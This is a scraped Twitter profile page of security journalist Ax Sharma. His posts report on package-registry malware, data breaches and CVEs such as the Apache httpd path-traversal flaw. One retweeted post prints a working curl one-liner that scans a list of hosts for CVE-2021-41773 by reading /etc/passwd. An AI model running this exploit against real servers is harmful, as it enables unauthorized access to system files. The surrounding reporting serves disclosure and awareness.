Ax Sharma
@Ax_Sharma
Followers
5,462
Following
1,417
Media
586
Statuses
3,535
Infosec Researcher, Journalist | 📰 Bylines + seen on 📸 BBC, BleepingComputer, Channel 5, WaPo, TechCrunch, WIRED | Member @The_BAJ @CAJ | ✉️ Tips? ax @hey .ax
🇬🇧 when not 🇮🇳🇨🇦
Joined April 2016
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
LINGORM CHARMING RISING COUPLE
• 413623 Tweets
袴田さん
• 118442 Tweets
Derrick Rose
• 28462 Tweets
#EchoesOfWisdom
• 24714 Tweets
#モニタリング
• 15307 Tweets
ScreenX
• 12035 Tweets
#ぐるナイ
• 10282 Tweets
D Rose
• 10193 Tweets
A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it.
The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:
55
1K
5K
A threat actor is now advising StackOverflow devs seeking debugging help to install a 'pytoileur'
#Python
package as a "solution" to their code troubles.
🛑DO NOT fall for this, it's a trap—the package has encoded code hidden on line 17 via whitespaces and infects Windows users
18
261
1K
EXCLUSIVE:
#Okta
says its GitHub source code repositories were stolen this December in a 'confidential' security notification sent to 'security contacts' that include IT managers at various organizations.
13
223
672
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the
#opensource
"httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now!
New fix checks for encoded path traversal characters e.g. /../.%2E/
11
337
564
Uber won't fix the vulnerability that lets anyone email as "Uber"—this isn't a spoofed email but sent from Uber via an exposed endpoint.
Researcher
@0x21SAFE
states threat actors could abuse this to phish 57 million victims of the 2016 Uber data breach.
16
160
553
Anonymous altered the official knowledgebase of Epik after the alt-right web hosting provider denied that any breach had occurred. Epik has provided services for the Texas GOP, 8chan, Parler, and Gab, among others.
#EpikFail
13
173
538
EXCLUSIVE: Newly discovered
#Azure
flaw lets attackers brute-force Active Directory credentials in an undetected manner.
At this time, there's no way to easily block the endpoints used by Seamless SSO.
#Microsoft
seems to consider this a "design" choice.
20
322
562
Turns out, this flaw or a deliberate design choice has been known for a while too, but remains unresolved.
6
40
533
GitHub calls these "anonymized URLs" but I'm not sure if that's accurate—considering they appear to be associated with a repo.
By contrast, Discord CDN URLs to "attachments" are truly anonymized and look like:
https://cdn.discordapp[.]com/attachments/XXXXX/XXXX/virus.exe
4
27
522
BREAKING: eFile[.]com, an IRS-authorized U.S. tax return software provider, was caught serving
#JavaScript
malware for weeks—as early as March 17th, and up until at least April 1st.
h/t
@malwrhunterteam
@johullrich
9
143
329
Dev behind popular
#npm
library 'node-ipc' released sabotaged versions that DELETE all data of Russian/Belarusian users by overwriting their files with '❤️'
#opensource
12
105
281
PyTorch reveals malicious dependency chain compromise between Dec 25th & 30th.
The counterfeit 'tortchtrion' stole SSH keys, first 1000 files in $HOME, .gitconfig and other secrets.
2,300+ downloads seen so far on PyPI.
Uninstall now 👇👇👇
#opensource
5
140
277
BREAKING:
#PHP
Git server is the latest victim of a software supply chain attack in which attackers planted a remote code execution
#backdoor
in the PHP source code.
PHP powers almost 8 out of 10 sites on the internet, making this upstream attack noteworthy.
#opensource
#git
3
200
227
CVE-2023-29218 👀
Twitter Recommendation Algorithm... allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking,...
8
68
213
Package is part of a wider ("Cool package") campaign infiltrating Python registries like PyPI since 2023. Multiple such similar typosquatting packages contain hidden obfuscated or encoded code, designed to drop persistent Windows malware as soon as these are installed.
2
12
204
BREAKING: UN
#DataBreach
exposed over 100,000 employee records and travel history due to publicly accessible '.git' directories and credential files. "Threat actors likely already have the data," state researchers
@Kirtaner
@johnjhacking
@JacksonHHax
@nicksahler
2
35
194
EXCLUSIVE: Ringleader of a massive fake news empire, 'Hacker X' comes out. Through extensive efforts, he created an untraceable webring of HUNDREDS of 'news' sites to spread conspiracy theories, propaganda to tip the 2016 US Election in Trump's favor.
14
96
160
2022 starts with Y2K22 bug: Emails getting stuck in Microsoft Exchange on-prem servers... 🤯
The cause? The FIP-FS malware scanning service that uses signed 'int32' format and can't fit '2022' 🥵💣
Here's a temporary workaround until MS releases a fix
7
65
166
🇨🇦 Canada's major banks: RBC, CIBC, Scotiabank, TD Bank, BMO all affected by a mysterious, hours-long outage.
Customers report e-transfers getting auto-rejected, access issues with online and mobile banking, and being stuck at grocery store checkouts.
13
87
136
Northern Ireland has temporarily suspended its COVID "vaccine passport" certification service following a data leak—some users seeing data of other users.
The incident has been reported to UK's IPO. Not all users are impacted 👇👇👇
#databreach
#dataleak
7
64
107
Phishing actors are targeting verified Twitter users as Twitter has been relentlessly removing blue badges from "incorrectly verified" accounts this week:
2
29
103
Turns out "netmask" has had yet another bug fix made in version 2.0.1 on
#npm
for the critical IP address validation
#vulnerability
as fixes for CVE-2021-28918 were deemed incomplete.
This was spotted by
@ryotkak
and a newer CVE-2021-29418 has now been assigned.
#opensource
2
20
97
So... turns out critical Apache Struts RCE
#vulnerability
(via OGNL Injection) of 2020 wasn't ...quite fully fixed.
Meet CVE-2021-31805—reviving CVE-2020-17530 that's rated a 9.8/Critical.
Upgrade to Struts 2.5.30 or above before it's late:
#opensource
0
35
84
One of the largest Vietnamese crypto trading apps, ONUS suffered a
#Log4J
hack, followed by a $5 million extortion demand.
After ONUS refused to pay the ransom, threat actors put up 2 million customer records, databases, & ID/passport images up for sale.
4
39
82
@shukla_tarun
@IndiGo6E
@TurkishAirlines
More power to the crew! They let this obnoxious, self-entitled man off too easy. So wish law enforcement was called to greet the 'unruly passenger' on landing. Baffling.
3
0
69
From fake
#TikTok
livestreams, to Midjourney being abused to make AI art — in this in-depth investigation,
@Hannah_Gelbart
& I delve into all the tricks scammers are playing to exploit the ecological disaster in
#Turkey
and Syria to steal your donations.
3
42
73
#npm
malware stealing Chrome passwords with a real password recovery tool disguised as "TeamViewer.exe" was itself amusing enough.
It just gets better when
#malware
author has a dump of their own plaintext passwords exposed🙃
Research by
@ReversingLabs
.
#opensource
#SupplyChain
2
26
65
EXCLUSIVE: A vulnerability (CVE) advisory from MITRE accidentally exposed over a dozen vulnerable systems—since at least April 2022.
4
16
64
BREAKING
#dataleak
:
@SakuraSamuraii
researchers
@rej_ex
@johnjhacking
@JacksonHHax
could peek into proprietary code, private messages, passwords, 1000s of docs of Fermilab: U.S. gov-backed particle physics and accelerator lab.
#vulnerability
#infosec
2
34
61
HaveIBeenPwned is alerting over 15 million users, including non-Epik customers who are impacted by the data breach.
Epik's multi-gig dump leaked by Anonymous also includes a 16 GB SQL database of scraped WHOIS records.
#EpikFail
#databreach
1
36
51
BREAKING: A secret terrorist watchlist with 2 million "no-fly" records was exposed online, accessible without a password.
Insecure Elasticsearch server was indexed by Censys. Taken offline 3 weeks after
@MayhemDayOne
notified DHS.
#dataleak
#databreach
2
29
51
Researcher refuses Telegram’s
#BugBounty
reward over the terms of agreement, and discloses the flaw with "self-destruct" feature that took months to resolve.
1
4
50
Multiple security vendors,
@CrowdStrike
@SentinelOne
and
@Sophos
have CONFIRMED trojanized 3CX Desktop app binaries being used in a supply chain attack.
The silence from
@3CX
is deafening.
2
27
49
"Upon investigation, we have concluded that such access was used to copy Okta code repositories," writes David Bradbury, the company's Chief Security Officer (CSO) in the email.
1
14
42
Kubernetes 1.24 coming out later today will be the first release to officially use
#Sigstore
—enabling seamless signature verification to protect against supply chain attacks across the 5.6M developer community, explains
@lorenc_dan
of
@chainguard_dev
0
15
45
Another neat GitHub trick.
The following URL makes it look like both the commit and the .txt file are from the google/leveldb repo—but they are not:
https://raw.githubusercontent[.]com/google/leveldb/2286a0cedd18b65255e7e54dc18630972420b7d6/test-file.txt
2
9
43
BREAKING: Atlassian is asking enterprise Jira Data Center customers to patch this critical
#RCE
.
Deserialization
#vulnerability
stems from unrestricted access to ports 40001 and 40011 in an Ehcache RMI network service, that remote attackers can exploit.
2
21
41
Russia-based dev Yaffle altered 'event-source-polyfill'
#npm
package in March to show anti-war messages to Russians, as a a peaceful protest.
This marks the THIRD major
#opensource
self-sabotage of 2022: npm package is downloaded 600K weekly and used by 135,000+ GitHub repos.
3
20
41
1. 35k code hits, not repos.
2.13k of these results are from just one (relatively unimportant) repo.
3. Rest of the repos are clones of projects, not original projects hijacked.
Impact is far smaller than what is hyped here. Granted, still a spammy mess for GitHub to clean up.
2
17
41
⚠️ Just because a library name itself contains a higher version number doesn't mean it's the newer or legit version of an official lib.
'colors-2.0', colors-3.0'... that keep surfacing on
#npm
have nothing to do with 'colors' but pack malware
#Opensource
4
18
41
Too much chatter about an *unconfirmed* RCE in Spring Core — based on 1 minor commit that deprecates Java deserialization in one of the classes.
Spring Core dev
@Sam_Brannen
confirms this is NOT a flaw, but a mere warning to anyone practicing untrusted deseriazation.
2
15
40
BREAKING: Turns out Python 3.x standard library "ipaddress" also has the octal IP address parsing
#vulnerability
that had previously impacted "netmask"
Introduced due to a 2019 regression bug
Credit:
@sickcodes
@koroeskohr
@johnjhacking
@kaoudis
@tensor_bodega
, et al
#opensource
1
21
38
Solid work by
@zzwudev
@mdmck10
@malwrhunterteam
reveals 1 operator behind all 4 domains, Polyfill, BootCDN, Bootcss and Staticfile involved in a supply chain attack that is now believed to have impacted anywhere from 100K to "tens of millions" of sites.
2
12
38
@0x21SAFE
Apparently, not the first time either that this was reported...
@BleepinComputer
@Ax_Sharma
hey mate! i reported same vulnerability back in march 2021 and they closed it as informative and didn't start crying like a baby
2
0
12
1
4
34
In her book "Manipulated," former White House CIO
@TrackerPayton
describes 'Hacker X' in detail, but it is the first time he's being publicly named.
Special thanks to
@packmatt73
, Theresa Payton, and many sources who helped fact-check the story.
4
13
34
NEW: Heavily obfuscated
#Python
#malware
caught on
#opensource
PyPI repo. It pulls now-deleted GitHub scripts to mine cryptocurrency on your computer.
Although deleted, some of the Bash scripts could be recovered after some searching:
via
@sonatype
0
28
34
Reddit users spotted the issue as early as March 17th when they noticed an SSL error message thrown by eFile[.]com which appeared to be fake.
1
5
35
💩 Sh*t gifting website ShitExpress hacked exposing customer email addresses, orders, and HYSTERICAL personalized messages customers had sent with their "gifts."
The hacker posted the
#dataleak
on a forum:
0
14
35
Python package 'onyxproxy' is an info-stealer using Unicode homoglyphs to evade detection. A real-world example of Trojan Source attack vector used in
#opensource
malware.
Discovery by
@Phylum_IO
Reporting by
@BillToulas
0
14
33
RubyInstaller[.]org's Wikis poisoned since Nov 29th, 2022 with links to malware and IP tracing/logging site, IPlogger.
Malware ZIP: e811cea654c10c0efe2618bf9d20e60c15497e8207cf5d8096aa75bab1e28573
#opensource
2
16
34
TELUS, Canada's second-largest telco, is investigating a potential
#databreach
after sample sets of company's employee data, payroll records, and private GitHub repos appeared on a data breach forum this week.
4
14
32
BREAKING: Researcher
@alxbrsn
hacked Microsoft, Apple, Tesla, Uber, Netflix, more in a novel
#opensource
software supply chain attack via dependency hijacking.
But
@sonatype
's automated
#malware
detection system has been a step ahead, learn how:
3
22
30
Kinda cool. npm package 'speedy-ts-compiler' downloads another package which is empty... but the code simultaneously and elegantly obtains your username via 'npm get cache' and exfiltrates it.
PoC research by
@Ajay_Kulal
#OpenSource
0
9
30
His team created several Facebook groups appealing to the Trump voter base where these "news" articles were shared, boosting the sites' 3 million monthly readership to 30 million. Articles generated by 'Hacker X' were retweeted by prominent personalities and unwary voters alike.
1
9
27
Over 21,000 U.S. driver licenses are up for sale on a hacker forum, along with credit reports. Forum post spotted by
@UnderTheBreach
.
The seller says they have managed to charge $400 for every 10k copies.
#databreach
2
10
24
New "Stark for Chrome" extension allows developers to bake accessibility into products and bridge the
#disability
divide.
Extension:
More info:
3
5
30
The '2FA Authenticator' Android app with 10,000+ installs on Google Play did provide real MFA functionality but... ran a hidden 'UpdateService' to download a malicious APK from domain:
⚠️ privacyandroidapp[.]club
1
9
26
PoC exploit now out for Azure Active Directory brute forcing flaw. Microsoft maintains it's not a vulnerability but appears to be working on a solution.
Includes additional commentary from
@DrAzureAD
@Secureworks
.
👇👇👇
1
10
28
#GitHub
Actions abused to run
#CryptoMining
#malware
automatically on
#GitHub
servers.
* Needs no action from the project maintainer
* Seen targeting at least 95
#opensource
repos
* Runs mislabeled "npm.exe" with attacker's wallet address
Discovered by
@JustinPerdok
GitHub Actions is being abused to mine cryptocurrency on GitHub servers in an automated attack. Attack requires no action by the targeted project that is forked. Cryptominer executes as soon as the Pull Request is filed. -
@Ax_Sharma
5
114
224
1
19
29
Popular hacking mag Hacker Noon resolves stored XSS
#security
#vulnerability
which could let clever hackers steal user data via SVG profile avatars.
An AxDB Exclusive:
#cybersecurity
#infosec
#javascript
#privacy
#hacking
#xss
#security
#hackernoon
0
31
29
"Tracked as CVE-2021-41773, the vulnerability is the result of an incomplete path normalization logic implemented in the Apache HTTP server 2.4.49 that in turn introduced a vulnerability."
1
1
27
BREAKING: A major
#BGP
leak last night impacted over 20,000 ASNs/networks around the world.
According to
@kentikinc
, some U.S. companies were also affected.
Analysis by
@DougMadory
@anurag_bhatia
#outage
#networksecurity
#securitynews
#infosec
1
15
27
"Why aren’t we sending an email to every user?
We evaluated the risk and consulted with our privacy lawyers and legal experts, and took the approach that... mitigated any issues while being open and transparent and did not believe emailing directly was helpful in this case."
4
2
27
BTW, "are" is a legitimate PyPI package from
@andreilapets
-- the researchers meant "aryi" (now removed). Luckily, caught this while writing my report.
0
12
24
The tainted 'popper.js' file, loaded on almost every eFile[.]com page, contains a base64-encoded one-liner further loading malicious JS from another domain:
1
2
26
Popular GitHub project 'qr.js' used by QR code apps got hit with a "repo hijack."
Although NPM version of 'qr.js' is safe for now, devs including a Facebook engineer are seeking
#opensource
alternatives to this heavily used
#JavaScript
QR code encoder.
0
12
23
6
1
25
Despite stealing Okta's source code, attackers did not gain unauthorized access to the Okta service or customer data, says the company.
"HIPAA, FedRAMP or DoD customers" remain unaffected and no customer action is needed.
2
2
24
...And it gets a PoC
CVE-2021-41773 POC 🔥👇
✅ One Liner :
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
10
392
983
1
0
26
And, they were right.
The 'update.js' file eventually loaded by the malicious code contains base64 string which is HTML code with this very SSL error message, as analyzed by
@BleepinComputer
.
1
2
25
Dark web marketplace CanadianHQ 🇨🇦 shut down by CRTC.
The site's patrons traded illicit goods and services including stolen credit card numbers, and illegal drugs.
Images via
@DarkDotFail
3
13
24
Malicious PyMafka package drops Cobalt Strike on Windows, macOS and appears to typosquat
#opensource
PyKafka, Apache Kafka client for Python.
#malware
1
16
24
@llkkaT
@hans_dam
🍿 Severity of CVE-2022-22963—SpEL Injection in Spring Cloud Function was bumped up from a Medium to CRITICAL just now 👀
h/t
@wayfaring_life
cc
@LawrenceAbrams
@wdormann
3
17
25
Although this may have started out as a peaceful "non-destructive" protest by the developer with 'peacenotwar' module, the addition of blatantly destructive payload to 'node-ipc' raised serious concerns in the community ⚠️ given the dev also maintains ~40 popular npm packages.
1
2
24
The malicious JavaScript file 'update.js', further attempts to prompt users to download next stage payload, depending on whether they are using Chrome [update.exe] or Firefox [installer.exe].
1
4
22
The good fight. 🥱
1
13
22
And, it gets worse.
PoC exploits for CVE-2021-41773 reveal it can evolve into full-on Remote Code Execution (RCE) on both Linux and Windows servers.
h/t
@hackerfantastic
@wdormann
@timb_machine
3
16
22
@shukla_tarun
@IndiGo6E
@TurkishAirlines
The eyewitness accounts and
@DGCAIndia
investigating the matter is satisfying 🥰
3
2
18
Newer versions 11.0.0 and above released for 'node-ipc' STILL continue to contain the 'peacenotwar' module that will generate text files propounding "peace" message on the Desktops of infected users:
2
2
20
PSA: CVE-2022-31289 is *NOT* a vulnerability or even a bug. The writeup on it was rushed without following any responsible disclosure and after half-baked "research."
@pmmali_
@HackerGautam
@shifacyclewala
here's the opportunity to set the record straight on your blog and reports.
7
8
24
2
7
20
@LucaBongiorni
@ATuin
@Microsoft
@ubuntu
By all means, call
@ubuntu
@Microsoft
out but why publicly name the representative? Are they even aware you leaked a private msg naming them?
8
0
20
In addition to using drive-by downloads and trojanized 'browser updates' to spread itself,
#LummaC2
crypto-stealer now targets Python developers by imitating popular cryptocurrency libraries like 'crytic-compile'.
The illicit package 'crytic-compilers' drops Lumma ⚠️
1
1
19
Clop
#ransomware
just removed
@AxisBank
, India's third largest private bank roughly two days after I'd reached out to Axis.
3
9
20
PyPI
#malware
'botaa3' - a poor typosquatting attempt at mimicking Amazon AWS SDK for Python 'boto3'. Has XOR-encrypted code to:
* Exfil. data
* Give attacker C2 capabilities: upload, download, browse, delete,...
* Kill itself
on
@sonatype
#opensource
0
4
20
'secretslib' PyPI package drops fileless malware to evade detection. Malicious payload injected in memory is a Monero cryptominer.
Threat actor even used 'Author' info of an engineer working for a U.S. Department of Energy-funded national lab.
#opensource
1
2
20
Just had another (verified) Dish Network employee reach out to me confirming on background that the company has indeed been "cyber attacked."
The employee received a written note from their manager stating, "it was caused by an outside bad actor, a known threat."
4
11
19
@AlbinatorB
@Immortal_Graves
@riverandmal
and
@breakaway71
No author, but regret looking into this. 😖
for public service, I must advise, do not click.
16
1
19
Proofpoint's
@sherrod_im
warns of over 2.8 million instances of scammers soliciting donations via fraudulent crypto wallet addresses.
1
2
17
Too early to conclude that an incident indeed at TELUS or rule out third-party vendor breach.
Employee names do check out though and correspond to present-day technical staff, like devs.
2
4
17